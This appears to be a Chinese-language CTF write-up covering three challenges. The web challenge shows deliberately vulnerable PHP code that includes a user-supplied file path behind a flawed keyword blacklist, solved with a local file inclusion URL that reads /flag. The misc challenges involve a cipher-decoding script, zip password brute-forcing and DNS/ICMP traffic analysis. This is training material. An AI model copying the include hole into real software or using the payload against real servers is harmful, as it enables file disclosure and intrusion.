web
easyrce
題目代碼如下:
<?php
error_reporting(0);
highlight_file(__FILE__);
if (!empty($_GET['PK'])){
$PK = $_GET['PK'];
if(blacklistFilter($_SERVER["QUERY_STRING"])){
include $PK;
}else{
highlight_file(__FILE__);
}
}
function blacklistFilter($arg) {
$blacklist = array('[', ']', ';', '?', '@', '(', ')', 'exec', 'eval', '$', 'phpinfo', 'flag', 'data', 'filter', '#');
$filteredInput = str_replace($blacklist, '', $arg);
return $filteredInput;
}
payload: http://e2e84684.clsadp.com/?PK=/flag
MISC
云纓
題目文本
8881088410842088810810842042108108821041010882108881
0為截斷,0前面的4位置相加之后為26個大寫英文字母的索引,exp如下:
#-*- coding utf8 -*-
import string
import hashlib
def decode(c):
l = c.split('0')
origin = string.ascii_uppercase
r = ''
for i in l:
tmp = 0
for num in i:
tmp += int(num)
r += origin[tmp-1]
return r
str = decode('8881088410842088810810842042108108821041010882108881')
md5 = hashlib.md5()
md5.update(str.encode())
print('flag{' + md5.hexdigest() + '}')
#flag{9edabf1448871181eb0e7133b5b3d701}
hack_dns
使用kali中join工具爆破出zip密碼
在key.jpg中
右鍵屬性里面詳細資訊獲得一串韓文加密
通過在線網站解密獲得 key1=ymh好像只有一半
使用base64解密 獲得key2=sec 這好像只有一半
key為 ymhsec
分析流量包,根據提示篩選出dns流量,發現其中icmp中存在16進制
提取出來得到
把其中0a替換為空,在使用16進制轉換10進制列印出來
通過得到的key使用柵欄密碼解密,已知y->24、m->12、h->7、s->18、e->4、c->2
按照順序位移,數字字符跳過
最后獲得flag:
flag(6fc0ea1e6f897033ee0c1fa40915d659}
轉載請註明出處,本文鏈接:https://www.uj5u.com/qita/554457.html
標籤:其他
下一篇:返回列表